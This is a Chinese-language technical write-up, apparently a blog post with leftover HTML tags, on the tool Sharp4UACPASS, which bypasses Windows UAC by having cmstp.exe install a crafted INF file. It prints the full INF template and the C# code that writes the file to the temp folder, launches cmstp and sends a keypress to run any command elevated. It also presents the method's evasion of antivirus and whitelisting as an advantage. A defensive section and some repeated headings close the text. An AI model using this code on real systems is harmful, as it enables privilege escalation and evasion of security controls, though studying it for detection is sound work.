Sharp4UACPASS：通过CMSTP进程绕过UAC的技术分析与实现<\/h1>

1. 工具概述<\/h2>

Sharp4UACPASS是一款利用Windows系统自带程序cmstp.exe实现UAC(用户账户控制)绕过的工具。该工具通过精心构造的INF配置文件，利用微软签名的合法二进制文件执行任意命令，具有以下特点：<\/p>

使用微软签名程序cmstp.exe作为载体<\/li>
通过自定义INF文件实现命令执行<\/li>
可绕过防病毒和应用白名单监控<\/li>

适用于渗透测试和红队活动<\/li> <\/ul>

2. CMSTP技术原理<\/h2>

2.1 CMSTP简介<\/h3>

cmstp.exe是Windows系统中用于安装网络连接配置文件的合法程序，主要用途包括：<\/p>

部署VPN配置<\/li>
安装网络连接文件<\/li>

典型命令格式：

cmstp.exe \/au "C:\path\to\vpn.inf"<\/code><\/li>
<\/ul>
2.2 INF文件结构分析<\/h3>
INF文件是Windows安装配置文件，Sharp4UACPASS利用其特定结构实现命令执行：<\/p>
[version]部分<\/h4>
[version]<\/span>
<\/span><\/span>Signature<\/span>=<\/span>$chicago$<\/span>
<\/span><\/span>AdvancedINF<\/span>=<\/span>2.5<\/span>
<\/span><\/span><\/code><\/pre>
Signature=$chicago$<\/code>：标准INF文件签名，表示兼容Windows<\/li>
AdvancedINF=2.5<\/code>：声明使用的高级INF格式版本<\/li>
<\/ul>
[DefaultInstall]部分<\/h4>
[DefaultInstall]<\/span>
<\/span><\/span>CustomDestination<\/span>=<\/span>CustInstDestSectionAllUsers<\/span>
<\/span><\/span>RunPreSetupCommands<\/span>=<\/span>RunPreSetupCommandsSection<\/span>
<\/span><\/span><\/code><\/pre>
CustomDestination<\/code>：指向自定义安装位置的逻辑节点<\/li>
RunPreSetupCommands<\/code>：指定安装前执行的命令节点<\/li>
<\/ul>
[CustInstDestSectionAllUsers]部分<\/h4>
[CustInstDestSectionAllUsers]<\/span>
<\/span><\/span>49000,49001<\/span>=<\/span>AllUSer_LDIDSection, 7<\/span>
<\/span><\/span><\/code><\/pre>
49000,49001<\/code>：逻辑标识符<\/li>
7<\/code>：表示共享目录的ID值<\/li>
<\/ul>
[AllUSer_LDIDSection]部分<\/h4>
[AllUSer_LDIDSection]<\/span>
<\/span><\/span>"HKLM", "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE", "ProfileInstallPath", "%UnexpectedError%", ""<\/span>
<\/span><\/span><\/code><\/pre>
定义注册表修改操作<\/li>
使用合法文件CMMGR32.EXE作为掩护<\/li>
<\/ul>
[RunPreSetupCommandsSection]部分<\/h4>
[RunPreSetupCommandsSection]<\/span>
<\/span><\/span>C:\Windows\System32\cmd.exe<\/span>
<\/span><\/span>taskkill \/IM cmstp.exe \/F<\/span>
<\/span><\/span><\/code><\/pre>
执行任意命令的关键部分<\/li>
最后终止cmstp.exe进程释放资源<\/li>
<\/ul>
3. 工具实现细节<\/h2>
3.1 INF模板定义<\/h3>
工具内部定义了INF文件模板字符串：<\/p>
public<\/span> static<\/span> string<\/span> InfData = "[version]\nSignature=$chicago$\nAdvancedINF=2.5\n \n[DefaultInstall]\nCustomDestination=CustInstDestSectionAllUsers\nRunPreSetupCommands=RunPreSetupCommandsSection\n \n[RunPreSetupCommandsSection]\nREPLACE_COMMAND_LINE\ntaskkill \/IM cmstp.exe \/F\n \n[CustInstDestSectionAllUsers]\n49000,49001=AllUSer_LDIDSection, 7\n \n[AllUSer_LDIDSection]\n\"HKLM\", \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\CMMGR32.EXE\", \"ProfileInstallPath\", \"%UnexpectedError%n \n[Strings]\nServiceName=\"VPN\"\nShortSvcName=\"VPN\"\n \n"<\/span>;
<\/span><\/span><\/code><\/pre>关键点：<\/p>

REPLACE_COMMAND_LINE<\/code>为占位符，将被实际命令替换<\/li>
包含完整的INF文件结构<\/li>
<\/ul>
3.2 INF文件生成方法<\/h3>
SetInfFile<\/code>方法负责动态生成INF文件：<\/p>
public<\/span> static<\/span> string<\/span> SetInfFile(string<\/span> CommandToExecute)
<\/span><\/span>{
<\/span><\/span>    string<\/span> value<\/span> = Path.GetRandomFileName().Split(new<\/span> char<\/span>[] { Convert.ToChar("."<\/span>) })[0<\/span>];
<\/span><\/span>    string<\/span> value2 = "C:\\windows\\temp"<\/span>;
<\/span><\/span>    StringBuilder stringBuilder = new<\/span> StringBuilder();
<\/span><\/span>    stringBuilder.Append(value2);
<\/span><\/span>    stringBuilder.Append("\\"<\/span>);
<\/span><\/span>    stringBuilder.Append(value<\/span>);
<\/span><\/span>    stringBuilder.Append(".inf"<\/span>);
<\/span><\/span>    
<\/span><\/span>    StringBuilder stringBuilder2 = new<\/span> StringBuilder(CMSTPBypass.InfData);
<\/span><\/span>    stringBuilder2.Replace("REPLACE_COMMAND_LINE"<\/span>, CommandToExecute);
<\/span><\/span>    
<\/span><\/span>    File.WriteAllText(stringBuilder.ToString(), stringBuilder2.ToString());
<\/span><\/span>    return<\/span> stringBuilder.ToString();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>特点：<\/p>

随机生成INF文件名<\/li>
文件保存在C:\windows\temp\<\/code>目录<\/li>
替换REPLACE_COMMAND_LINE<\/code>为实际命令<\/li>
<\/ul>
3.3 命令执行方法<\/h3>
Execute<\/code>方法实现整个绕过流程：<\/p>
public<\/span> static<\/span> bool<\/span> Execute(string<\/span> CommandToExecute)
<\/span><\/span>{
<\/span><\/span>    if<\/span> (!File.Exists(CMSTPBypass.BinaryPath))
<\/span><\/span>    {
<\/span><\/span>        return<\/span> false<\/span>;
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    StringBuilder stringBuilder = new<\/span> StringBuilder();
<\/span><\/span>    stringBuilder.Append(CMSTPBypass.SetInfFile(CommandToExecute));
<\/span><\/span>    
<\/span><\/span>    Process.Start(new<\/span> ProcessStartInfo(CMSTPBypass.BinaryPath)
<\/span><\/span>    {
<\/span><\/span>        Arguments = "\/au "<\/span> + stringBuilder.ToString(),
<\/span><\/span>        UseShellExecute = false<\/span>
<\/span><\/span>    });
<\/span><\/span>    
<\/span><\/span>    IntPtr value<\/span> = 0<\/span>;
<\/span><\/span>    value<\/span> = IntPtr.Zero;
<\/span><\/span>    do<\/span>
<\/span><\/span>    {
<\/span><\/span>        value<\/span> = CMSTPBypass.SetWindowActive("cmstp"<\/span>);
<\/span><\/span>    } while<\/span> (value<\/span> == IntPtr.Zero);
<\/span><\/span>    
<\/span><\/span>    SendKeys.SendWait("{ENTER}"<\/span>);
<\/span><\/span>    return<\/span> true<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>执行流程：<\/p>

检查cmstp.exe是否存在<\/li>
生成包含指定命令的INF文件<\/li>
以\/au<\/code>参数启动cmstp.exe<\/li>
等待cmstp窗口激活<\/li>
模拟回车键确认操作<\/li>
<\/ol>
4. 防御建议<\/h2>
针对此类攻击，建议采取以下防御措施：<\/p>


限制cmstp.exe执行<\/strong>：<\/p>

通过AppLocker或WDAC限制cmstp.exe执行<\/li>
监控cmstp.exe的异常调用<\/li>
<\/ul>
<\/li>

INF文件监控<\/strong>：<\/p>

监控临时目录下的INF文件创建<\/li>
分析INF文件内容是否包含可疑命令<\/li>
<\/ul>
<\/li>

权限管理<\/strong>：<\/p>

最小权限原则，避免日常使用管理员账户<\/li>
启用UAC最高级别设置<\/li>
<\/ul>
<\/li>

进程行为监控<\/strong>：<\/p>

监控cmstp.exe启动子进程的行为<\/li>
特别关注cmstp.exe后接cmd.exe的调用链<\/li>
<\/ul>
<\/li>

补丁与更新<\/strong>：<\/p>

及时安装Windows安全更新<\/li>
关注微软相关安全公告<\/li>
<\/ul>
<\/li>
<\/ol>
5. 总结<\/h2>
Sharp4UACPASS工具利用Windows系统自带程序cmstp.exe和INF配置文件的特性，实现了隐蔽的UAC绕过。这种技术具有以下优势：<\/p>

使用微软签名程序，绕过白名单检测<\/li>
不依赖漏洞，利用合法功能实现攻击<\/li>
执行过程相对隐蔽，难以被传统AV检测<\/li>
<\/ol>
理解这种技术的原理和实现方式，对于蓝队防御和红队攻击都具有重要意义。防御方可以针对性地加强监控和防护，攻击方则可以在合规测试中验证系统安全性。<\/p>

Sharp4UACPASS：通过CMSTP进程绕过UAC的技术分析与实现<\/h1>

2. CMSTP技术原理<\/h2>

2.2 INF文件结构分析<\/h3> INF文件是Windows安装配置文件，Sharp4UACPASS利用其特定结构实现命令执行：<\/p>

3. 工具实现细节<\/h2>

2.2 INF文件结构分析<\/h3>
INF文件是Windows安装配置文件，Sharp4UACPASS利用其特定结构实现命令执行：<\/p>